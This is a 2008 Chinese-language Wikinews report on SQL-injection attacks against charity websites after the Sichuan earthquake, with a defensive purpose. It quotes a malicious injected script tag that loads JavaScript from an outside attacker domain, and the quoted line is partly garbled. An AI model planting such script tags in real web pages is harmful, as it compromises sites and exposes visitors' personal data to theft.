資訊安全再陷危機 慈善團體網站受害最甚 隱碼攻擊為主因

维基新闻,自由的新闻源
跳到导航 跳到搜索

【2008年5月21日讯】

四川大地震衍伸出的問題,在各領域上屢見不鮮,不只觀光業,就連救災、慈善相關的網站,近期也被駭客鎖定為主要的攻擊目標,當中,「SQL隱碼攻擊」是主要關鍵。

趨勢科技指出,因為四川大地震的關係,使得眾多慈善團體的網站,點閱率大幅提升,也大幅增加犯罪者植入木馬的機會,駭客更利用微軟在兩年前發佈的MS06-14漏洞,進行入侵攻擊,一旦使用者連上被入侵的網站,點選外部連結後,其他相關網站也會遭到攻擊,目前所知,亞洲地區有近十萬以上的網站遭波及。

另外,阿瑪科技根據近期受害的亞洲網站進行分析,當中,更指出,只要在大型搜尋引擎,輸入駭客指令的關鍵字,就可以看到眾多網站會被植入包含「<script>」的程式語法,範例如下:

<script src=http:/<script src=http://9i5t.cn/a.js></script> <script src=http://9i5t.cn/a.js></script>

此類攻擊手段,是駭客先入侵伺服器端,找到注入點,之後讓受害的網站,在無意間與駭客端連結,而當使用者連上線後,個人資料隨即遭到駭客的竊取,造成個資外洩的嚴重問題。

雖然受害的網站已有部分修復完畢,但台灣資安產業已發出警示,提醒使用者搜尋網站時,除了注意安全警示標與外,並儘量不要連入庫存網站頁面,以免遭受攻擊。

消息來源

外部連結